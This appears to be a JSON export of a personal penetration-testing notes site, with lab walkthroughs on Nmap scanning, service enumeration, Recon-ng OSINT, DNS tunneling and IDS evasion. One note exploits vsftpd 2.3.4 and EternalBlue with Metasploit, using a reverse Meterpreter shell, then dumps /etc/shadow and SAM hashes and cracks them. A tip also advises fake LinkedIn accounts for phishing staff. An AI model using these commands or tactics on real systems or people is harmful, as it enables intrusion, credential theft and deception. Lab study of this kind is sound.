BREAKDOWN:\n–A: This enables Nmap to profile the target to identify its operating system, service versions, and script scanning, as well as perform a traceroute. -T: This syntax specifies the timing options for the scan, which ranges from 0 – 5, where 0 is very slow and 5 is the fastest. This command is good for preventing too many probes from being sent to the target too quickly. -p: Using the –p syntax allows you to specify which port(s) to identify as opened or closed on a target. You can specify –p80 to scan for port 80 only on the target and –p- to scan all 65,535 ports on a target. Important By default, Nmap performs scans on Transmission Control Protocol (TCP) ports only. Therefore, if a target is running a service on a User Datagram Protocol (UDP) server port, there\u0026rsquo;s a possibility you will miss it. 
To perform a scan on a port or range of UDP ports, such as to scan for UDP port 53, use the –p U:53 command.\nIt was also able to perform banner grabbing and determine whether there\u0026rsquo;s an authentication system/login mechanism for each service. Now after seeing the information, we can look for version-specific exploits or any credentials that can come in handy. Important SMB is a TCP/IP network protocol that is used to allow file and printer sharing services between host devices on a network. Discovering SMB on a host system is an indication that there may be a file share located on the target system, and it\u0026rsquo;s something worth checking out.\nThe following is some additional syntax that can be used with Nmap to gather specific information:\n-Pn: This command performs a scan on the target without sending an ICMP Echo Request (ping) message. This command is useful for scanning systems that have ICMP responses disabled. -sU: This command allows Nmap to perform a UDP port scan on the target. This command is useful for identifying any services that use UDP compared to TCP. -p : This command allows a penetration tester to scan a single port or range such as –p80, -p 80,443,8080, or –p 100-200. -sV: This command allows Nmap to send special probes to identify the service versions of any open ports on the target system. -O: This command allows Nmap to identify and profile the operating system on the target system. -6: This command enables Nmap to perform scanning on a system or network that has an IPv6 address. By identifying the operating systems of targets, penetration testers can create an exploit and payload that are designed to work efficiently on those specific operating systems. Simply put, an exploit or payload for a Windows operating system will most likely not work on a Linux-based system and vice versa. 
Enumerating SMTP service: Using netcat: nc -nv 172.30.1.134 25 Inside netcat use this command VRFY root to verify user: As shown in the preceding screenshot, netcat is able to successfully establish a connection to the targeted system on port 25, which further identifies that SMTP is running. When the VRFY root command is executed, the email service response indicates that the user exists. Note When performing SMTP enumeration, there are various commands that enable us to verify whether a valid user exists or not. For instance, the VRFY command is used to determine whether a valid user exists on the email server. The EXPN command is used to identify the delivery address for an email alias. The RCPT TO command is used to point to a recipient’s email address.\nIt\u0026rsquo;s very hectic to manually look for users; instead, use a bash script that will enumerate the users in SMTP: Install the script from The ultimate kali book's github account Give executable permission to the script chmod +x smtp_user_enum.sh Convert the script to Linux-style line endings, as it has Windows-style line endings, using this command dos2unix smtp_user_enum.sh Now execute the code as shown in the following screenshot: command: ./smtp_user_enum.sh target_ip wordlist_directory In my case it didn\u0026rsquo;t return anything Enumerating SNMP service: SNMP is a common network protocol that enables network professionals to monitor, manage, and troubleshoot common networking devices. In addition, IT professionals use SNMP to retrieve sensitive information from their devices, such as the following: • System uptime • Device hostname • CPU and memory utilization • Interface status and statistics • Operating system • Open ports and running services\nChecking if SNMP is running or not: nmap -sU -p 161 172.30.1.134 COMMAND BRIEF:\n-sU : performs a UDP scan -p : We need to provide here the port number for SNMP default port. 
Next, perform SNMP enumeration using the SNMP-Check tool: snmp-check -p 161 -c public -v 1 172.30.1.134 COMMAND BREAKDOWN: • -p: This allows you to specify the targeted port; by default, it’s set to port 161. • -c: This allows you to specify the community string to log in to the targeted system; the default community string is public. • -v: This allows you to specify the SNMP version to use; by default, it’s set to version 1.\nThe SNMP-Check tool was able to enumerate the following information from the target: • System information • User accounts • Network information • Routing information • Network services • Running processes • Software components\n","permalink":"https://0x-s0M3n4th.github.io/notes/pen-testing-notes/network-pentesting/04-active-information-gathering/04-probing-open-services-ports-and-os/","summary":"\u003cp\u003eAfter discovering the hosts on a network, the next phase is to identify any open service ports on the target system and determine which services are mapped to those open ports. There are various techniques that a penetration tester can use to identify the open ports on a target system. 
Some techniques are manual, while others can simply be automated using the Nmap tool\u003c/p\u003e\n\u003col\u003e\n\u003cli\u003eBasic \u003ccode\u003enmap\u003c/code\u003e scan, this will perform a scan of the \u003ccode\u003e1000\u003c/code\u003e commonly used ports:\n\u003cimg alt=\"op_1\" loading=\"lazy\" src=\"/images/Pentesting/NP/AIG/04/op_1.png\"\u003e\u003c/li\u003e\n\u003c/ol\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003enmap 172.30.1.134\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\n            \u003clink rel=\"stylesheet\" href=\"/css/vendors/admonitions.4fd9a0b8ec8899f2ca952048d255a569f433f77dfb3f52f5bc87e7d65cdce449.css\" integrity=\"sha256-T9mguOyImfLKlSBI0lWlafQz9337P1L1vIfn1lzc5Ek=\" crossorigin=\"anonymous\"\u003e\n    \u003cdiv class=\"admonition tip\"\u003e\n      \u003cdiv class=\"admonition-header\"\u003e\u003csvg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 384 512\"\u003e\u003cpath d=\"M272 384c9.6-31.9 29.5-59.1 49.2-86.2c0 0 0 0 0 0c5.2-7.1 10.4-14.2 15.4-21.4c19.8-28.5 31.4-63 31.4-100.3C368 78.8 289.2 0 192 0S16 78.8 16 176c0 37.3 11.6 71.9 31.4 100.3c5 7.2 10.2 14.3 15.4 21.4c0 0 0 0 0 0c19.8 27.1 39.7 54.4 49.2 86.2l160 0zM192 512c44.2 0 80-35.8 80-80l0-16-160 0 0 16c0 44.2 35.8 80 80 80zM112 176c0 8.8-7.2 16-16 16s-16-7.2-16-16c0-61.9 50.1-112 112-112c8.8 0 16 7.2 16 16s-7.2 16-16 16c-44.2 0-80 35.8-80 80z\"/\u003e\u003c/svg\u003e\n        \u003cspan\u003eTip\u003c/span\u003e\n      \u003c/div\u003e\n      \u003cdiv class=\"admonition-content\"\u003e\n        \u003cp\u003eAs an aspiring ethical hacker and penetration tester, if you\u0026rsquo;re not familiar with some of the services discovered from a scan, you must perform research to gain a better understanding of a service role and its functionality on a system and 
network.\u003c/p\u003e","title":"Probing Open Services, Ports \u0026 OS"},{"content":"Gathering data using whois: The whois command helps us to find publicly available data about domains. The following is a brief list of some information types that are usually stored for public records:\nRegistrant contact information Administrative contact information Technical contact information Name servers Important dates, such as registration, update, and expiration dates Registry domain ID Registrar information Kali has a built-in whois tool: Info Keep in mind that, as the need for online privacy increases around the world, domain registrars and organizations are paying a premium fee to ensure their contact data is not revealed by WHOIS databases to the general public. This means that you will not commonly find private contact data about domains on WHOIS databases if the domain owner pays the premium for additional privacy features.\nTip Take advantage of publicly available information like job portals (from which we can get info about the company\u0026rsquo;s technical equipment, employee requirements, their contact info, what kind of tech they are currently using, etc.). Make sock puppets on LinkedIn and connect with high-privilege individuals, try to phish them, etc. Take as much advantage as possible of the public info. 
Make a threat model using that information.\nQuite often, you will notice that employees who are in a leadership role will commonly share their contact details on professional social networking sites, such as the following:\nFull name Job title Company\u0026rsquo;s email address Telephone number Roles and responsibilities Projects containing technical details Pictures of their employee badge As a penetration tester, it\u0026rsquo;s quite simple to create an account that will function as a sock puppet on a site such as LinkedIn, populate some false information on the account, such as information stating you\u0026rsquo;re an employee who is working at another branch office, and then add some low-level employees to the organization. There is a possibility the employees will automatically accept the connection/friend request because they will see that you\u0026rsquo;re a fellow employee at their company. This will provide some leverage for you to connect with the high-profile employees of the target organization and attempt various types of social engineering tactics. Hunter.io With Hunter.io we can find a particular company\u0026rsquo;s employees\u0026rsquo; info. As shown in the preceding screenshot, Hunter can provide a list of employees\u0026rsquo; information, such as their names, email addresses, telephone numbers, and other sources of information. Furthermore, Hunter.io provides the format of employees\u0026rsquo; email addresses. Such information is also useful when attempting password spraying and credential stuffing techniques. Recon-ng Recon-ng is an OSINT reconnaissance framework written in Python. To use recon-ng : recon-ng [recon-ng][default] \u0026gt; marketplace install all # this will install all the modules of recon-ng 2. To see the installed modules inside recon-ng, use the command modules search :\n3. We can create separate workspaces inside this tool, just like in Metasploit: 4. 
To see the list of workspaces, use the command workspaces list Tip The workspaces load \u0026lt;workspace-name\u0026gt; command allows you to select and work in the specific workspace, while the workspaces remove \u0026lt;workspace-name\u0026gt; command removes a workspace from Recon-ng.\nWe can search for any modules using the command modules search \u0026lt;module_name\u0026gt; To use a specific module within Recon-ng, use the modules load command. Let\u0026rsquo;s gather a list of point-of-contacts (POCs) for a target domain. Use the following commands to use the POCS module: To set the requirements for the POCS module, use the following command to set microsoft.com as SOURCE for our target: Tip To unset a value within a module, use the option unset \u0026lt;parameter\u0026gt; command. Ensure that you use the info command to verify whether the parameter value is set or unset within a module.\nTo exit the recon-ng module, use the command back To see the stored data, for example the contacts we found, use show contacts How to add different services\u0026rsquo; API keys inside recon-ng: Tip To view a list of all supported API modules and their keys on Recon-ng, use the keys list command. 
To add an API key to Recon-ng, use the keys add \u0026lt;API module name\u0026gt; \u0026lt;API key value\u0026gt; command.\nShow command: Tip The show command can be used with show [companies] [credentials] [hosts] [locations] [ports] [pushpins] [vulnerabilities] [contacts] [domains] [leaks] [netblocks] [profiles] [repositories] to view specific information that was obtained by Recon-ng.\nTo view a summary of your activities, use the dashboard command: Generating a report inside recon-ng: Use this command to find the reporting modules: modules search report Now we need to load the module for the format we want to export; I want it as HTML, so I will use this command to load it: modules load reporting/html , then we can use the command info to see the details we need to set before running the module: We will set the details using these commands : options set CREATOR 0xdf , options set CUSTOMER MS-Target , options set FILENAME saving_location : then hit run The report recon-web recon-ng has its own web interface called recon-web ; we can access it by typing the following command inside the terminal: recon-web This will start a web server. Open it in your browser, DONE ","permalink":"https://0x-s0M3n4th.github.io/notes/pen-testing-notes/network-pentesting/02-reconnaissance/04-information-gathering-techniques-using-whois-recon-ng/","summary":"\u003ch2 id=\"gathering-data-using-whois\"\u003eGathering data using whois:\u003c/h2\u003e\n\u003cp\u003e\u003ccode\u003ewhois\u003c/code\u003e command helps us to find publicly available data about domains.\nThe following is a brief list of some information types that are usually stored for public\nrecords:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eRegistrant contact information\u003c/li\u003e\n\u003cli\u003eAdministrative contact information\u003c/li\u003e\n\u003cli\u003eTechnical contact information\u003c/li\u003e\n\u003cli\u003eName servers\u003c/li\u003e\n\u003cli\u003eImportant dates, such as registration, update, and expiration 
dates\u003c/li\u003e\n\u003cli\u003eRegistry domain ID\u003c/li\u003e\n\u003cli\u003eRegistrar information\u003c/li\u003e\n\u003c/ul\u003e\n\u003col\u003e\n\u003cli\u003eKali is having a built-in \u003ccode\u003ewhois\u003c/code\u003e tool:\n\u003cimg alt=\"ig_1\" loading=\"lazy\" src=\"/images/Pentesting/NP/recon/04/ig_1.png\"\u003e\u003c/li\u003e\n\u003c/ol\u003e\n\n            \u003clink rel=\"stylesheet\" href=\"/css/vendors/admonitions.4fd9a0b8ec8899f2ca952048d255a569f433f77dfb3f52f5bc87e7d65cdce449.css\" integrity=\"sha256-T9mguOyImfLKlSBI0lWlafQz9337P1L1vIfn1lzc5Ek=\" crossorigin=\"anonymous\"\u003e\n    \u003cdiv class=\"admonition info\"\u003e\n      \u003cdiv class=\"admonition-header\"\u003e\u003csvg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 512 512\"\u003e\u003cpath d=\"M256 512A256 256 0 1 0 256 0a256 256 0 1 0 0 512zM216 336l24 0 0-64-24 0c-13.3 0-24-10.7-24-24s10.7-24 24-24l48 0c13.3 0 24 10.7 24 24l0 88 8 0c13.3 0 24 10.7 24 24s-10.7 24-24 24l-80 0c-13.3 0-24-10.7-24-24s10.7-24 24-24zm40-208a32 32 0 1 1 0 64 32 32 0 1 1 0-64z\"/\u003e\u003c/svg\u003e\n        \u003cspan\u003eInfo\u003c/span\u003e\n      \u003c/div\u003e\n      \u003cdiv class=\"admonition-content\"\u003e\n        \u003cp\u003eKeep in mind that, as the need for online privacy increases around the world, domain registrars and organizations are paying a premium fee to ensure their contact data is not revealed by WHOIS databases to the general public. This means that you will not commonly find private contact data about domains that are no longer being revealed on WHOIS databases if the domain owner pays the premium for additional privacy features.\u003c/p\u003e","title":"Whois \u0026 Recon-ng Framework"},{"content":"How does DNS tunneling works? It\u0026rsquo;s a step-by-step process that relies on the openness of DNS to carry other traffic without detection. 
Here\u0026rsquo;s how it works, step by step:\nThe attacker registers a domain\nThe domain, like badsite.com, is controlled by the attacker and points to a server they own. The attacker infects a computer\nThey use malware to gain control of a computer inside a target network. The computer becomes the client for the DNS tunnel. The client sends a DNS query\nThe infected computer encodes data in DNS queries. For example, it puts a secret value in the subdomain of a DNS request. The query reaches the DNS resolver\nThe DNS resolver forwards the request to the appropriate servers to resolve the domain name. The attacker\u0026rsquo;s server decodes the request\nThe attacker\u0026rsquo;s server receives the DNS request. It decodes the embedded data and can send back commands or other data in DNS responses. The server encodes a response\nThe attacker\u0026rsquo;s server encodes its own data as a DNS response. This could be an instruction for the infected computer to carry out. The client receives and decodes the response\nThe infected computer receives the DNS response from the resolver. It decodes the data and takes action as instructed. The process repeats as needed\nIf the data is too large for a single DNS message, the client and server split it into smaller parts. Each part is sent in its own DNS query or response. Attackers often use tools like iodine, dnscat2, and Cobalt Strike to perform DNS tunneling, which handle the encoding and decoding of data within DNS packets.\nEssentially, DNS tunneling uses the trusted DNS protocol as a cover for sending hidden data. This lets attackers maintain a covert channel between a compromised system and their command server.\nCREDITS: paloaltonetworks_blog\nDifferent types of DNS tunneling attacks: Example: The SUNBURST malware, used in the SolarWinds breach (2020), included DNS-based C2 functionality. It used subdomain queries to pass encoded victim information to attacker-controlled nameservers. 
Example: In 2017, researchers uncovered DNSMessenger, a PowerShell-based backdoor that used DNS TXT records to exfiltrate data without writing files to disk.\nExample: OilRig, an APT group active since 2014, used DNS tunneling to map network structures and identify targets before escalating attacks.\nExample: Astrill VPN and HA Tunnel Plus both use DNS tunneling to bypass captive portals or ISP restrictions—often observed in enterprise and commercial travel networks.\nExample: The Decoy Dog campaign (2023) used DNS tunneling to deliver staged payloads. TXT and CNAME records were used to distribute encoded data back to infected hosts.\nFor mitigation, detection and prevention strategies, follow the blog of Palo Alto Networks.\nPRACTICAL COMING SOON FOR ADVANCED DNS C2 OPERATION USING dnscat2\n","permalink":"https://0x-s0M3n4th.github.io/notes/pen-testing-notes/network-pentesting/08-post-exploitation-techniques/05-dns-tunneling/","summary":"\u003ch2 id=\"how-does-dns-tunneling-works\"\u003eHow does DNS tunneling work?\u003c/h2\u003e\n\u003cp\u003eIt\u0026rsquo;s a step-by-step process that relies on the openness of DNS to carry other traffic without detection.\n\u003cimg alt=\"dt_1\" loading=\"lazy\" src=\"/images/Pentesting/NP/PE/05/dt_1.png\"\u003e\nHere\u0026rsquo;s how it works, step by step:\u003c/p\u003e\n\u003col\u003e\n\u003cli\u003e\u003cstrong\u003eThe attacker registers a domain\u003c/strong\u003e\u003cbr\u003e\nThe domain, like badsite.com, is controlled by the attacker and points to a server they own.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eThe attacker infects a computer\u003c/strong\u003e\u003cbr\u003e\nThey use malware to gain control of a computer inside a target network. The computer becomes the client for the DNS tunnel.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eThe client sends a DNS query\u003c/strong\u003e\u003cbr\u003e\nThe infected computer encodes data in DNS queries. 
For example, it puts a secret value in the subdomain of a DNS request.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eThe query reaches the DNS resolver\u003c/strong\u003e\u003cbr\u003e\nThe DNS resolver forwards the request to the appropriate servers to resolve the domain name.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eThe attacker\u0026rsquo;s server decodes the request\u003c/strong\u003e\u003cbr\u003e\nThe attacker\u0026rsquo;s server receives the DNS request. It decodes the embedded data and can send back commands or other data in DNS responses.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eThe server encodes a response\u003c/strong\u003e\u003cbr\u003e\nThe attacker\u0026rsquo;s server encodes its own data as a DNS response. This could be an instruction for the infected computer to carry out.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eThe client receives and decodes the response\u003c/strong\u003e\u003cbr\u003e\nThe infected computer receives the DNS response from the resolver. It decodes the data and takes action as instructed.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eThe process repeats as needed\u003c/strong\u003e\u003cbr\u003e\nIf the data is too large for a single DNS message, the client and server split it into smaller parts. Each part is sent in its own DNS query or response.\u003c/li\u003e\n\u003c/ol\u003e\n\u003cp\u003eAttackers often use tools like iodine, dnscat2, and Cobalt Strike to perform DNS tunneling. Which handle the encoding and decoding of data within DNS packets.\u003c/p\u003e","title":"DNS Tunneling"},{"content":"Whenever a packet is sent from one device to another, the source IP address is included within the header of the packet. 
This is the default behavior of the TCP/IP protocol stack.\nAvoiding detections using decoys: If you want to perform a scan on the target system at 172.30.1.134 and use the decoy feature of Nmap, we can use the -D option: nmap target_ip -D DECOY_IP More nmap based IDS evasion scans: nmap -Pn -sV -p80,443 -f{IDS EVASION} --mtu 8 IP_ADDRESS nmap -Pn -sS -sV -p445,3389 -f --data-length 200 -D{decoy} GATEWAY_IP_FOR_DECOY ATTACKING_IP nmap -Pn -sS -sV -p445,3389 -f --data-length 200 -g 53 -D(decoy) GATEWAY_IP_FOR_DECOY ATTACKING_IP COMMAND BRIEFS:\nThe first command uses fragmented packets so that the IDS can\u0026rsquo;t analyze them. MTU → Maximum Transmission Unit → the data packet size; the minimum is 8 bytes. The second command uses the technique of decoy IPs. We make the traffic look as if it\u0026rsquo;s coming from the gateway itself by giving a decoy IP such as 192.168.0.1 . If we want to specify more than one decoy IP, we can do that by separating the decoy IPs with commas. We can also change the source port to look less suspicious: normally a random source port is used for the packet transfer, so to avoid that we can use the -g option followed by the port number we want to spoof. ","permalink":"https://0x-s0M3n4th.github.io/notes/pen-testing-notes/network-pentesting/04-active-information-gathering/05-evasion-techniques/","summary":"\u003cp\u003eWhenever a packet is sent from one device to another, the source IP address is included within the header of the packet. 
This is the default behavior of the TCP/IP protocol stack.\u003c/p\u003e\n\u003ch2 id=\"avoiding-detections-using-decoys\"\u003eAvoiding detections using decoys:\u003c/h2\u003e\n\u003cp\u003e\u003cimg alt=\"ev_1\" loading=\"lazy\" src=\"/images/Pentesting/NP/AIG/05/ev_1.png\"\u003e\nIf you want to perform a scan on the target system at 172.30.1.134 and use the decoy feature of Nmap, we can use the \u003ccode\u003e–D\u003c/code\u003e syntax\n\u003cimg alt=\"ev_2\" loading=\"lazy\" src=\"/images/Pentesting/NP/AIG/05/ev_2.png\"\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003enmap target_ip -D DECOY_IP\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"more-nmap-based-ids-evasion-scans\"\u003eMore nmap based IDS evasion scans:\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003enmap -Pn -sV -p80,443 -f\u003cspan class=\"o\"\u003e{\u003c/span\u003eIDS EVASION\u003cspan class=\"o\"\u003e}\u003c/span\u003e --mtu \u003cspan class=\"m\"\u003e8\u003c/span\u003e IP_ADDRESS\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003enmap -Pn -sS -sV -p445,3389 -f --data-length \u003cspan class=\"m\"\u003e200\u003c/span\u003e -D\u003cspan class=\"o\"\u003e{\u003c/span\u003edecoy\u003cspan class=\"o\"\u003e}\u003c/span\u003e GATEWAY_IP_FOR_DECOY ATTACKING_IP\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003enmap -Pn 
-sS -sV -p445,3389 -f --data-length \u003cspan class=\"m\"\u003e200\u003c/span\u003e -g \u003cspan class=\"m\"\u003e53\u003c/span\u003e -D\u003cspan class=\"o\"\u003e(\u003c/span\u003edecoy\u003cspan class=\"o\"\u003e)\u003c/span\u003e GATEWAY_IP_FOR_DECOY ATTACKING_IP\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003eCOMMAND BRIEFS:\u003c/p\u003e","title":"Evasion Techniques"},{"content":"Exploiting linux-based systems: Fire up metasploitable 2 linux Scan the target using nmap: nmap -A -p 21 172.30.1.134 Nmap was able to identify the service version of the FTP service as vsFTPd 2.3.4 Search in google vsftpd 2.3.4 exploit We have an exploit module from rapid7 itself Open up msfconsole sudo msfconsole msf6 \u0026gt; use exploit/unix/ftp/vsftpd_234_backdoor msf6 exploit(unix/ftp/vsftpd_234_backdoor) \u0026gt; set payload cmd/unix/interact msf6 exploit(unix/ftp/vsftpd_234_backdoor) \u0026gt; set RHOSTS 172.30.1.20 msf6 exploit(unix/ftp/vsftpd_234_backdoor) \u0026gt; exploit 6. Upgrade the shell using the command python -c 'import pty; pty.spawn(\u0026quot;/bin/bash\u0026quot;)' 7. Got a root shell on the target system, dumped the /etc/shadow file where the hashes of the users\u0026rsquo; passwords are stored. 8. Save the credentials into a text file; make sure to remove the unnecessary users from the output: Format of a shadow password file Each line of the file contains nine fields that are separated by colons:\nUsername: User account and login name that exists in the system. Encrypted password: Password using the format $type$salt$hashed and eight to 12 characters long. Last password change: Date since Jan. 1, 1970, when the password was last changed. Minimum password age: The minimum number of days that must elapse before the password can be changed by the user. Maximum password age: The number of days after which the password must be changed. 
Warning period: The number of days before the password expires, during which time the user gets a warning to change the password. Inactivity period: The number of days post-expiration \u0026ndash; since Jan. 1, 1970 \u0026ndash; before the user\u0026rsquo;s account is disabled. Expiration date: The date on which the account was disabled. Unused: This field is left empty and reserved for future use. Next, we can use a popular password-cracking tool such as John the Ripper to perform offline password cracking to retrieve the plaintext password: john /home/kali/msf2_linux_user_hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt Exploiting windows based system: I am going to use a vulnerable VM named Blue, which has the EternalBlue vulnerability (MS17-010). Identifying its IP: Target machine: Scanning the target using nmap nmap -A -p 136-139,445 192.168.83.136 I am going to focus on ports 136, 139 and 445, because the vulnerability is in SMB. 139,445 -\u0026gt; SMB ports are open. We will try to identify the version of SMB using metasploit sudo msfconsole use smb_version 6. Let\u0026rsquo;s check if the machine is vulnerable to ms17-010 It didn\u0026rsquo;t pick up the vulnerability, but the exploit did: 7. Now let\u0026rsquo;s use the exploit module:\nmsf6\u0026gt; use exploit/windows/smb/ms17_010_eternalblue msf6 exploit(windows/smb/ms17_010_eternalblue) \u0026gt; set payload windows/x64/meterpreter/reverse_tcp msf6 exploit(windows/smb/ms17_010_eternalblue) \u0026gt; set RHOSTS 192.168.83.136 msf6 exploit(windows/smb/ms17_010_eternalblue) \u0026gt; set LHOST 192.168.83.128 msf6 exploit(windows/smb/ms17_010_eternalblue) \u0026gt; exploit 8. Run some commands to check our privileges: 9. 
Next, use the hashdump command within Meterpreter to extract the contents of the Security Account Manager (SAM) file: The SAM file is found within Microsoft Windows operating systems in the %SystemRoot%/system32/config/SAM directory and contains a record of all local user accounts, their Security Identifier (SID) values, and password hashes. You can identify the usernames, as they are in plaintext, and the LAN Manager (LM) and New Technology LAN Manager (NTLM) password hashes for each local user account. The SAM file stores each user’s credentials in the following format: Username : Security Identifier (SID) : LM hash : NTLM hash Save the hashdump output into a txt file. Additionally, save the user Administrator with its LM and NTLM hashes into another text file, name it Blue_admin_user.txt, and use the following format: Administrator:aad3b435b51404eeaad3b435b51404ee:58f5081696f366cdc72491a2c4996bd5 Identifying the hash type; the part of the admin entry starting with 58f5 is the NTLM hash value : hashid 58f5081696f366cdc72491a2c4996bd5 Important Keep in mind that Microsoft Windows operating systems do not store local users’ passwords in plaintext. Instead, they parse the plaintext password through a hashing algorithm such as NTLM, which performs a one-way function of converting the plaintext password into a cryptographic NTLM digest (hash). This process is non-reversible. The NTLM hash of each local user account is stored within the SAM file\nCracking hashes with hashcat: Identifying hash type of NTLM Command for cracking: hashcat -m 1000 /home/kali/Blue_pass_hashes.txt -a 0 /usr/share/wordlists/rockyou.txt # we can give one hash also hashcat -m 1000 \u0026#34;hash_value\u0026#34; /usr/share/wordlists/rockyou.txt Setting up hashcat on the host machine: Step 1: Install Dependencies Before you download Hashcat, you need to install two key dependencies:\nGPU Drivers: Hashcat uses your graphics card (GPU) for password cracking. You must install the latest drivers for your specific card. 
For NVIDIA GPUs: Download and install the latest CUDA Toolkit from the NVIDIA Developer website. For AMD/Intel GPUs: Download and install the latest Adrenalin Edition drivers from the AMD Support website. Using the \u0026ldquo;Auto-Detect and Install\u0026rdquo; tool is often the easiest option. Visual C++ Redistributable: Hashcat requires the Microsoft Visual C++ runtime libraries. Download and install the latest \u0026ldquo;Visual Studio 2015, 2017, 2019, and 2022\u0026rdquo; package from the official Microsoft website. Be sure to get the X64 version. Also install one library inside visual studio installer which is \u0026quot;Desktop development with C++\u0026quot; Install Your respective NVIDIA GPU DRIVER from NVIDIA-DRIVERS , select your GPU model and install it. After installing these, it\u0026rsquo;s a good idea to restart your computer.\nStep 2: Download and Extract Hashcat Go to the official Hashcat website. Download the binary version (it will be a .7z file). You will need a file archiver like 7-Zip (which is free) to extract the .7z file. Create a new folder in a simple location (like C:\\hashcat). Extract the contents of the downloaded .7z file into your new C:\\hashcat folder. Step 3: Run Hashcat Open the Start Menu, type cmd, and select Run as administrator. change directory to : cd hashcat/hashcat-7.1.2 3. To verify the installation and see all your connected devices (CPUs/GPUs), run a benchmark test:\nhashcat.exe -b You should see results like these: 4. After this run on your wordlists and hashes to crack:\nC:\\hashcat\\hashcat-7.1.2\u0026gt;hashcat.exe -m 1000 \u0026#34;C:\\Blue_pass_hashes.txt\u0026#34; C:\\rockyou.txt 5. 
checking on single hash:\nhashcat -m 1000 \u0026#34;7A21990FCD3D759941E45C490F143D5F\u0026#34; rockyou.txt ","permalink":"https://0x-s0M3n4th.github.io/notes/pen-testing-notes/network-pentesting/07-performing-network-penetration-testing/05-identifying-and-exploiting-vulnerable-services/","summary":"\u003ch2 id=\"exploiting-linux-based-systems\"\u003eExploiting linux-based systems:\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eFire up \u003ccode\u003emetasploitanle 2 linux\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eScan the target using nmap:\u003c/li\u003e\n\u003c/ol\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003enmap -A -p \u003cspan class=\"m\"\u003e21\u003c/span\u003e 172.30.1.134\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003e\u003cimg alt=\"le_1\" loading=\"lazy\" src=\"/images/Pentesting/NP/NPP/05/le_1.png\"\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eNmap was able to identify the service version of the FTP service as vsFTPd 2.3.4\u003c/li\u003e\n\u003c/ul\u003e\n\u003col start=\"3\"\u003e\n\u003cli\u003eSearch in google \u003ccode\u003evsftpd 2.3.4 exploit\u003c/code\u003e\n![[Pasted image 20251020125219.png]]\u003c/li\u003e\n\u003cli\u003eWe are having an exploit module from \u003ccode\u003erapid7\u003c/code\u003e itself\n\u003cimg alt=\"le_2\" loading=\"lazy\" src=\"/images/Pentesting/NP/NPP/05/le_2.png\"\u003e\u003c/li\u003e\n\u003cli\u003eOpen up \u003ccode\u003emsfconsole\u003c/code\u003e\u003c/li\u003e\n\u003c/ol\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003esudo msfconsole\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003emsf6 
